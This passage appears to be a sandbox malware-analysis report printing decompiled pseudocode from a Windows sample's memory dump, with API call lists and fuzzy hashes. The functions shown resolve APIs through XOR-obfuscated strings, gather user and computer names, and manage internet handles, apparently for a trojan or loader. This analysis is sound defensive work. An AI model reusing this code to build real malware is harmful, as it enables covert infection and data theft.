                            						_t33 = 0;
                            					} else {
                            						_t49 =  *0xcfd2a0; // 0x63699bc3
                            						_t33 = E00CF6676(_t71, _t70, _t49 ^ 0x3603764c);
                            					}
                            					if(_t33 != 0) {
                            						_t71 =  &_v8;
                            						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                            							 *0xcfd02c = _v8;
                            						}
                            					}
                            					if(_t70 == 0) {
                            						_t34 = 0;
                            					} else {
                            						_t45 =  *0xcfd2a0; // 0x63699bc3
                            						_t34 = E00CF6676(_t71, _t70, _t45 ^ 0x2cc1f2fd);
                            					}
                            					if(_t34 != 0) {
                            						_push(_t34);
                            						_t42 = 0x10;
                            						_t43 = E00CF5AC8(_t42);
                            						if(_t43 != 0) {
                            							_push(_t43);
                            							E00CF59EE();
                            						}
                            					}
                            					if(_t70 == 0) {
                            						_t35 = 0;
                            					} else {
                            						_t40 =  *0xcfd2a0; // 0x63699bc3
                            						_t35 = E00CF6676(_t71, _t70, _t40 ^ 0xb30fc035);
                            					}
                            					if(_t35 != 0 && E00CF5AC8(0, _t35) != 0) {
                            						_t85 =  *0xcfd324; // 0x31795b0
                            						E00CF972C(_t85 + 4, _t38);
                            					}
                            					HeapFree( *0xcfd238, 0, _t70);
                            					L48:
                            					return 0;
                            				}
                            			}

                            APIs
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00CF5068,?,63699BC3,00CF5068,?,63699BC3,00000005,00CFD00C,00000008,?,00CF5068), ref: 00CF2EDA
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00CF5068,?,63699BC3,00CF5068,?,63699BC3,00000005,00CFD00C,00000008,?,00CF5068), ref: 00CF2F0C
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00CF5068,?,63699BC3,00CF5068,?,63699BC3,00000005,00CFD00C,00000008,?,00CF5068), ref: 00CF2F3E
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00CF5068,?,63699BC3,00CF5068,?,63699BC3,00000005,00CFD00C,00000008,?,00CF5068), ref: 00CF2F70
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00CF5068,?,63699BC3,00CF5068,?,63699BC3,00000005,00CFD00C,00000008,?,00CF5068), ref: 00CF2FA2
                            • HeapFree.KERNEL32(00000000,00CF5068,00CF5068,?,63699BC3,00CF5068,?,63699BC3,00000005,00CFD00C,00000008,?,00CF5068), ref: 00CF3022
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: b3865a8875d6e148de731e5a09e2f811308a47505e221adf09cb8699f485e4e8
                            • Instruction ID: bcaed6e49093041c8b99a131b5cef727a67d6dfe258760b38bd9c101e4b5bebe
                            • Opcode Fuzzy Hash: b3865a8875d6e148de731e5a09e2f811308a47505e221adf09cb8699f485e4e8
                            • Instruction Fuzzy Hash: 4E51A670A20219AFCB90EBF5DD88E7F76BDAB487007750955B602D7115EA31DE00E763
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(00000000), ref: 00CFA290
                            • SysAllocString.OLEAUT32(0070006F), ref: 00CFA2A4
                            • SysAllocString.OLEAUT32(00000000), ref: 00CFA2B6
                            • SysFreeString.OLEAUT32(00000000), ref: 00CFA31E
                            • SysFreeString.OLEAUT32(00000000), ref: 00CFA32D
                            • SysFreeString.OLEAUT32(00000000), ref: 00CFA338
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            • Opcode ID: fd95b361ab68f95ba28270969e04d40fca12efe2032b972ea0dae012d4d165da
                            • Instruction ID: c84bf922e159d146f1362736aa143ca79b3a2cb3b6e13e496cc2f27558b073a2
                            • Opcode Fuzzy Hash: fd95b361ab68f95ba28270969e04d40fca12efe2032b972ea0dae012d4d165da
                            • Instruction Fuzzy Hash: D541507290060DAFDB41DFB8D944AAEB7BAEF49310F144465EE14EB120DA71DE05CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00CF933F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                            				intOrPtr _v8;
                            				intOrPtr _t23;
                            				intOrPtr _t26;
                            				_Unknown_base(*)()* _t28;
                            				intOrPtr _t30;
                            				_Unknown_base(*)()* _t32;
                            				intOrPtr _t33;
                            				_Unknown_base(*)()* _t35;
                            				intOrPtr _t36;
                            				_Unknown_base(*)()* _t38;
                            				intOrPtr _t39;
                            				_Unknown_base(*)()* _t41;
                            				intOrPtr _t44;
                            				struct HINSTANCE__* _t48;
                            				intOrPtr _t54;
                            
                            				_t54 = E00CF8D59(0x20);
                            				if(_t54 == 0) {
                            					_v8 = 8;
                            				} else {
                            					_t23 =  *0xcfd2a4; // 0x247a5a8
                            					_t1 = _t23 + 0xcfe11a; // 0x4c44544e
                            					_t48 = GetModuleHandleA(_t1);
                            					_t26 =  *0xcfd2a4; // 0x247a5a8
                            					_t2 = _t26 + 0xcfe769; // 0x7243775a
                            					_v8 = 0x7f;
                            					_t28 = GetProcAddress(_t48, _t2);
                            					 *(_t54 + 0xc) = _t28;
                            					if(_t28 == 0) {
                            						L8:
                            						E00CF677C(_t54);
                            					} else {
                            						_t30 =  *0xcfd2a4; // 0x247a5a8
                            						_t5 = _t30 + 0xcfe756; // 0x614d775a
                            						_t32 = GetProcAddress(_t48, _t5);
                            						 *(_t54 + 0x10) = _t32;
                            						if(_t32 == 0) {
                            							goto L8;
                            						} else {
                            							_t33 =  *0xcfd2a4; // 0x247a5a8
                            							_t7 = _t33 + 0xcfe40b; // 0x6e55775a
                            							_t35 = GetProcAddress(_t48, _t7);
                            							 *(_t54 + 0x14) = _t35;
                            							if(_t35 == 0) {
                            								goto L8;
                            							} else {
                            								_t36 =  *0xcfd2a4; // 0x247a5a8
                            								_t9 = _t36 + 0xcfe4d2; // 0x4e6c7452
                            								_t38 = GetProcAddress(_t48, _t9);
                            								 *(_t54 + 0x18) = _t38;
                            								if(_t38 == 0) {
                            									goto L8;
                            								} else {
                            									_t39 =  *0xcfd2a4; // 0x247a5a8
                            									_t11 = _t39 + 0xcfe779; // 0x6c43775a
                            									_t41 = GetProcAddress(_t48, _t11);
                            									 *(_t54 + 0x1c) = _t41;
                            									if(_t41 == 0) {
                            										goto L8;
                            									} else {
                            										 *((intOrPtr*)(_t54 + 4)) = _a4;
                            										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                            										_t44 = E00CF5194(_t54, _a8);
                            										_v8 = _t44;
                            										if(_t44 != 0) {
                            											goto L8;
                            										} else {
                            											 *_a12 = _t54;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _v8;
                            			}

                            APIs
                              • Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65
                            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00CF8DB5,?,00000001,?,?,00000000,00000000), ref: 00CF9364
                            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00CF9386
                            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00CF939C
                            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00CF93B2
                            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00CF93C8
                            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00CF93DE
                              • Part of subcall function 00CF5194: memset.NTDLL ref: 00CF5213
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: AddressProc$AllocateHandleHeapModulememset
                            • String ID:
                            • API String ID: 1886625739-0
                            • Opcode ID: b3600e843f6e39b8325fa3aa9602c864d00a4fbf2ad0ea1db7edff2db783c7bc
                            • Instruction ID: dff4ce2e4eca848725d07502cb58593008ce122da9b2c8e809594c37a260b0ea
                            • Opcode Fuzzy Hash: b3600e843f6e39b8325fa3aa9602c864d00a4fbf2ad0ea1db7edff2db783c7bc
                            • Instruction Fuzzy Hash: EA211CB160060AEFDB51EF69CD84F7ABBECEF543047014466E619CB221D770EA06CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 88%
                            			E00CF6791(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                            				signed int _v8;
                            				char _v12;
                            				signed int* _v16;
                            				void _v284;
                            				void* __esi;
                            				char* _t60;
                            				intOrPtr* _t61;
                            				intOrPtr _t65;
                            				char _t68;
                            				intOrPtr _t72;
                            				void* _t73;
                            				intOrPtr _t75;
                            				void* _t78;
                            				void* _t88;
                            				void* _t96;
                            				void* _t97;
                            				int _t102;
                            				signed int* _t104;
                            				intOrPtr* _t105;
                            				void* _t106;
                            
                            				_t97 = __ecx;
                            				_v8 = _v8 & 0x00000000;
                            				_t102 = _a16;
                            				if(_t102 == 0) {
                            					__imp__( &_v284,  *0xcfd33c);
                            					_t96 = 0x80000002;
                            					L6:
                            					_t60 = E00CF978C(0,  &_v284);
                            					_a8 = _t60;
                            					if(_t60 == 0) {
                            						_v8 = 8;
                            						L29:
                            						_t61 = _a20;
                            						if(_t61 != 0) {
                            							 *_t61 =  *_t61 + 1;
                            						}
                            						return _v8;
                            					}
                            					_t105 = _a24;
                            					if(E00CFA0A7(_t97, _t105, _t96, _t60) != 0) {
                            						L27:
                            						E00CF677C(_a8);
                            						goto L29;
                            					}
                            					_t65 =  *0xcfd2a4; // 0x247a5a8
                            					_t16 = _t65 + 0xcfe8fe; // 0x65696c43
                            					_t68 = E00CF978C(0, _t16);
                            					_a24 = _t68;
                            					if(_t68 == 0) {
                            						L14:
                            						_t29 = _t105 + 0x14; // 0x102
                            						_t33 = _t105 + 0x10; // 0x3d00cfc0
                            						if(E00CF66BD( *_t33, _t96, _a8,  *0xcfd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                            							_t72 =  *0xcfd2a4; // 0x247a5a8
                            							if(_t102 == 0) {
                            								_t35 = _t72 + 0xcfea5f; // 0x4d4c4b48
                            								_t73 = _t35;
                            							} else {
                            								_t34 = _t72 + 0xcfe89f; // 0x55434b48
                            								_t73 = _t34;
                            							}
                            							if(E00CF15EE( &_a24, _t73,  *0xcfd334,  *0xcfd338,  &_a24,  &_a16) == 0) {
                            								if(_t102 == 0) {
                            									_t75 =  *0xcfd2a4; // 0x247a5a8
                            									_t44 = _t75 + 0xcfe871; // 0x74666f53
                            									_t78 = E00CF978C(0, _t44);
                            									_t103 = _t78;
                            									if(_t78 == 0) {
                            										_v8 = 8;
                            									} else {
                            										_t47 = _t105 + 0x10; // 0x3d00cfc0
                            										E00CF5931( *_t47, _t96, _a8,  *0xcfd338, _a24);
                            										_t49 = _t105 + 0x10; // 0x3d00cfc0
                            										E00CF5931( *_t49, _t96, _t103,  *0xcfd330, _a16);
                            										E00CF677C(_t103);
                            									}
                            								} else {
                            									_t40 = _t105 + 0x10; // 0x3d00cfc0
                            									E00CF5931( *_t40, _t96, _a8,  *0xcfd338, _a24);
                            									_t43 = _t105 + 0x10; // 0x3d00cfc0
                            									E00CF5931( *_t43, _t96, _a8,  *0xcfd330, _a16);
                            								}
                            								if( *_t105 != 0) {
                            									E00CF677C(_a24);
                            								} else {
                            									 *_t105 = _a16;
                            								}
                            							}
                            						}
                            						goto L27;
                            					}
                            					_t21 = _t105 + 0x10; // 0x3d00cfc0
                            					if(E00CF63A4( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                            						_t104 = _v16;
                            						_t88 = 0x28;
                            						if(_v12 == _t88) {
                            							 *_t104 =  *_t104 & 0x00000000;
                            							_t26 = _t105 + 0x10; // 0x3d00cfc0
                            							E00CF66BD( *_t26, _t96, _a8, _a24, _t104);
                            						}
                            						E00CF677C(_t104);
                            						_t102 = _a16;
                            					}
                            					E00CF677C(_a24);
                            					goto L14;
                            				}
                            				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                            					goto L29;
                            				} else {
                            					memcpy( &_v284, _a8, _t102);
                            					__imp__(_t106 + _t102 - 0x117,  *0xcfd33c);
                            					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                            					_t96 = 0x80000003;
                            					goto L6;
                            				}
                            			}

                            APIs
                            • StrChrA.SHLWAPI(00CF4D4E,0000005F,00000000,00000000,00000104), ref: 00CF67C4
                            • memcpy.NTDLL(?,00CF4D4E,?), ref: 00CF67DD
                            • lstrcpy.KERNEL32(?), ref: 00CF67F3
                              • Part of subcall function 00CF978C: lstrlen.KERNEL32(?,00000000,00CFD330,00000001,00CF3435,00CFD00C,00CFD00C,00000000,00000005,00000000,00000000,?,?,?,00CF568F,00CF5073), ref: 00CF9795
                              • Part of subcall function 00CF978C: mbstowcs.NTDLL ref: 00CF97BC
                              • Part of subcall function 00CF978C: memset.NTDLL ref: 00CF97CE
                              • Part of subcall function 00CF5931: lstrlenW.KERNEL32(00CF4D4E,?,?,00CF6967,3D00CFC0,80000002,00CF4D4E,00CF2227,74666F53,4D4C4B48,00CF2227,?,3D00CFC0,80000002,00CF4D4E,?), ref: 00CF5951
                              • Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788
                            • lstrcpy.KERNEL32(?,00000000), ref: 00CF6815
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                            • String ID: \
                            • API String ID: 2598994505-2967466578
                            • Opcode ID: 8c394b434b79c7fe6eede2eadf8cb316f7a6ddda1e691e1db3100726673b30c9
                            • Instruction ID: 26cd2e1504425f298861ebf3c9b84cbeb3b811aa8a85904684cfd36233d1eb0c
                            • Opcode Fuzzy Hash: 8c394b434b79c7fe6eede2eadf8cb316f7a6ddda1e691e1db3100726673b30c9
                            • Instruction Fuzzy Hash: D051597210020EEFDF51AFA0DD40EBE7BBAEB48300F104519FB2696161D732DA25EB12
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00CF26A0() {
                            				long _v8;
                            				long _v12;
                            				int _v16;
                            				long _t39;
                            				long _t43;
                            				signed int _t47;
                            				short _t51;
                            				signed int _t52;
                            				int _t56;
                            				int _t57;
                            				char* _t64;
                            				short* _t67;
                            
                            				_v16 = 0;
                            				_v8 = 0;
                            				GetUserNameW(0,  &_v8);
                            				_t39 = _v8;
                            				if(_t39 != 0) {
                            					_v12 = _t39;
                            					_v8 = 0;
                            					GetComputerNameW(0,  &_v8);
                            					_t43 = _v8;
                            					if(_t43 != 0) {
                            						_v12 = _v12 + _t43 + 2;
                            						_t64 = E00CF8D59(_v12 + _t43 + 2 << 2);
                            						if(_t64 != 0) {
                            							_t47 = _v12;
                            							_t67 = _t64 + _t47 * 2;
                            							_v8 = _t47;
                            							if(GetUserNameW(_t67,  &_v8) == 0) {
                            								L7:
                            								E00CF677C(_t64);
                            							} else {
                            								_t51 = 0x40;
                            								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                            								_t52 = _v8;
                            								_v12 = _v12 - _t52;
                            								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                            									goto L7;
                            								} else {
                            									_t56 = _v12 + _v8;
                            									_t31 = _t56 + 2; // 0xcf1e0d
                            									_v12 = _t56;
                            									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                            									_v8 = _t57;
                            									if(_t57 == 0) {
                            										goto L7;
                            									} else {
                            										_t64[_t57] = 0;
                            										_v16 = _t64;
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _v16;
                            			}
















                            APIs
                            • GetUserNameW.ADVAPI32(00000000,00CF1E0B), ref: 00CF26B4
                            • GetComputerNameW.KERNEL32(00000000,00CF1E0B), ref: 00CF26D0
                              • Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65
                            • GetUserNameW.ADVAPI32(00000000,00CF1E0B), ref: 00CF270A
                            • GetComputerNameW.KERNEL32(00CF1E0B,?), ref: 00CF272D
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00CF1E0B,00000000,00CF1E0D,00000000,00000000,?,?,00CF1E0B), ref: 00CF2750
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                            • String ID:
                            • API String ID: 3850880919-0
                            • Opcode ID: 438bf7b7c4406c6c8857609c54d62cf52baa31694c64b5bdf2f083e191b9bd6e
                            • Instruction ID: 4446a17a3e291253640a9328f725969a012f5b10f71cfc9e304f00b5faa4e861
                            • Opcode Fuzzy Hash: 438bf7b7c4406c6c8857609c54d62cf52baa31694c64b5bdf2f083e191b9bd6e
                            • Instruction Fuzzy Hash: 4F21D876900208FFCB11DFE9DA85EBEBBB8EF48704B1044AAE601E7251DA309B45DB11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 65%
                            			E00CF6A9A(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                            				void* _t17;
                            				void* _t18;
                            				void* _t19;
                            				void* _t20;
                            				void* _t21;
                            				intOrPtr _t24;
                            				void* _t37;
                            				intOrPtr* _t38;
                            				void* _t41;
                            				intOrPtr* _t45;
                            
                            				_t41 = __edi;
                            				_t37 = __ebx;
                            				_t45 = __eax;
                            				_t16 =  *((intOrPtr*)(__eax + 0x20));
                            				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                            					E00CF9837(_t16, __ecx, 0xea60);
                            				}
                            				_t17 =  *(_t45 + 0x18);
                            				_push(_t37);
                            				_t38 = E00CFD134; // 0xcfad51
                            				_push(_t41);
                            				if(_t17 != 0) {
                            					InternetSetStatusCallback(_t17, 0);
                            					 *_t38( *(_t45 + 0x18));
                            				}
                            				_t18 =  *(_t45 + 0x14);
                            				if(_t18 != 0) {
                            					InternetSetStatusCallback(_t18, 0);
                            					 *_t38( *(_t45 + 0x14));
                            				}
                            				_t19 =  *(_t45 + 0x10);
                            				if(_t19 != 0) {
                            					InternetSetStatusCallback(_t19, 0);
                            					 *_t38( *(_t45 + 0x10));
                            				}
                            				_t20 =  *(_t45 + 0x1c);
                            				if(_t20 != 0) {
                            					CloseHandle(_t20);
                            				}
                            				_t21 =  *(_t45 + 0x20);
                            				if(_t21 != 0) {
                            					CloseHandle(_t21);
                            				}
                            				_t22 =  *((intOrPtr*)(_t45 + 8));
                            				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                            					E00CF677C(_t22);
                            					 *((intOrPtr*)(_t45 + 8)) = 0;
                            					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                            				}
                            				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                            				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                            					E00CF677C(_t23);
                            				}
                            				_t24 =  *_t45;
                            				if(_t24 != 0) {
                            					_t24 = E00CF677C(_t24);
                            				}
                            				_t46 =  *((intOrPtr*)(_t45 + 4));
                            				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                            					return E00CF677C(_t46);
                            				}
                            				return _t24;
                            			}














                            APIs
                            • InternetSetStatusCallback.WININET(?,00000000), ref: 00CF6AC8
                            • InternetSetStatusCallback.WININET(?,00000000), ref: 00CF6AD8
                            • InternetSetStatusCallback.WININET(?,00000000), ref: 00CF6AE8
                            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,00CF3392,?,?,00000000,00000000,74B481D0), ref: 00CF6AFD
                            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,00CF3392,?,?,00000000,00000000,74B481D0), ref: 00CF6B07
                              • Part of subcall function 00CF9837: WaitForMultipleObjects.KERNEL32(00000002,00CFA9FB,00000000,00CFA9FB,?,?,?,00CFA9FB,0000EA60), ref: 00CF9852
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: CallbackInternetStatus$CloseHandle$MultipleObjectsWait
                            • String ID:
                            • API String ID: 3686715076-0
                            • Opcode ID: 0dd97a9a1e645a2a84428df9d2716055af9f3adb01e4d140649900d966a7466e
                            • Instruction ID: fe2d78a990e64685717e8d4dd6f95d544372165df3359369d32d8bb38be6f074
                            • Opcode Fuzzy Hash: 0dd97a9a1e645a2a84428df9d2716055af9f3adb01e4d140649900d966a7466e
                            • Instruction Fuzzy Hash: C0113A7660064CABC670AFAADC84C2BF7FDEF483043554D19F296E3520C721FC44AA62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 70%
                            			E00CF57EF(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                            				char _v5;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				char _t28;
                            				void* _t35;
                            				void* _t40;
                            				char* _t41;
                            				void* _t43;
                            				void* _t48;
                            				char _t49;
                            				int _t50;
                            				int _t53;
                            				void* _t54;
                            
                            				_t48 = _a4;
                            				_t54 = __eax;
                            				_v12 = 0xb;
                            				if(_t48 != 0 && __eax != 0) {
                            					_t5 = _t54 - 1; // -1
                            					_t41 = _t48 + _t5;
                            					_t28 =  *_t41;
                            					_v5 = _t28;
                            					 *_t41 = 0;
                            					__imp__(_a8, _t40);
                            					_push(_a8);
                            					_v16 = _t28;
                            					_push(_t48);
                            					E00CFD114();
                            					_t49 = _t28;
                            					if(_t49 != 0) {
                            						 *_t41 = _v5;
                            						_t43 = RtlAllocateHeap( *0xcfd238, 0, _a16 + __eax);
                            						if(_t43 == 0) {
                            							_v12 = 8;
                            						} else {
                            							_t50 = _t49 - _a4;
                            							memcpy(_t43, _a4, _t50);
                            							_t35 = memcpy(_t43 + _t50, _a12, _a16);
                            							_t44 = _v16;
                            							_t53 = _a16;
                            							memcpy(_t35 + _t53, _t50 + _v16 + _a4, _t54 - _t50 - _t44);
                            							 *_a20 = _t43;
                            							_v12 = _v12 & 0x00000000;
                            							 *_a24 = _t54 - _v16 + _t53;
                            						}
                            					}
                            				}
                            				return _v12;
                            			}

















                            APIs
                            • lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 00CF5823
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 00CF584F
                            • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 00CF5863
                            • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00CF5872
                            • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00CF588D
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: memcpy$AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 1819133394-0
                            • Opcode ID: 891443cace4a95de66063c29acb30efc363b429a1f9a18ae39eba141d281c9db
                            • Instruction ID: f26dcc5043c8502c6640fe28e92781e681d4d643451122d434be43215c34c731
                            • Opcode Fuzzy Hash: 891443cace4a95de66063c29acb30efc363b429a1f9a18ae39eba141d281c9db
                            • Instruction Fuzzy Hash: E2219C36900209BFDF018F68C884BAEBFB9EF84340F058054FE05AB315CB319A55CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00CF9864(intOrPtr _a4) {
                            				void* _t2;
                            				unsigned int _t4;
                            				void* _t5;
                            				long _t6;
                            				void* _t7;
                            				void* _t15;
                            
                            				_t2 = CreateEventA(0, 1, 0, 0);
                            				 *0xcfd26c = _t2;
                            				if(_t2 == 0) {
                            					return GetLastError();
                            				}
                            				_t4 = GetVersion();
                            				if(_t4 != 5) {
                            					L4:
                            					if(_t15 <= 0) {
                            						_t5 = 0x32;
                            						return _t5;
                            					}
                            					L5:
                            					 *0xcfd25c = _t4;
                            					_t6 = GetCurrentProcessId();
                            					 *0xcfd258 = _t6;
                            					 *0xcfd264 = _a4;
                            					_t7 = OpenProcess(0x10047a, 0, _t6);
                            					 *0xcfd254 = _t7;
                            					if(_t7 == 0) {
                            						 *0xcfd254 =  *0xcfd254 | 0xffffffff;
                            					}
                            					return 0;
                            				}
                            				if(_t4 >> 8 > 0) {
                            					goto L5;
                            				}
                            				_t15 = _t4 - _t4;
                            				goto L4;
                            			}










                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00CF103A,?,?,00000001,?,?,?,00CF91B4,?), ref: 00CF986C
                            • GetVersion.KERNEL32(?,00000001,?,?,?,00CF91B4,?), ref: 00CF987B
                            • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00CF91B4,?), ref: 00CF9897
                            • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00CF91B4,?), ref: 00CF98B4
                            • GetLastError.KERNEL32(?,00000001,?,?,?,00CF91B4,?), ref: 00CF98D3
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                            • String ID:
                            • API String ID: 2270775618-0
                            • Opcode ID: 3e6529fffa13dc2b925c637b532b6dd7174b3c4d86a79613fd7c1663274322f3
                            • Instruction ID: 0493a9f3a0a2aa5339d4a0e94c7b0b0fda12fa90754c4c1fc5e74d20cd9b847b
                            • Opcode Fuzzy Hash: 3e6529fffa13dc2b925c637b532b6dd7174b3c4d86a79613fd7c1663274322f3
                            • Instruction Fuzzy Hash: BEF0A97074034AEBEBA08B24AE09B3D3BA2E742781F10441AE713C61F0DB70C802CB57
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 46%
                            			E00CF2CC3(intOrPtr* __eax) {
                            				void* _v8;
                            				WCHAR* _v12;
                            				void* _v16;
                            				char _v20;
                            				void* _v24;
                            				intOrPtr _v28;
                            				void* _v32;
                            				intOrPtr _v40;
                            				short _v48;
                            				intOrPtr _v56;
                            				short _v64;
                            				intOrPtr* _t54;
                            				intOrPtr* _t56;
                            				intOrPtr _t57;
                            				intOrPtr* _t58;
                            				intOrPtr* _t60;
                            				void* _t61;
                            				intOrPtr* _t63;
                            				intOrPtr* _t65;
                            				short _t67;
                            				intOrPtr* _t68;
                            				intOrPtr* _t70;
                            				intOrPtr* _t72;
                            				intOrPtr* _t75;
                            				intOrPtr* _t77;
                            				intOrPtr _t79;
                            				intOrPtr* _t83;
                            				intOrPtr* _t87;
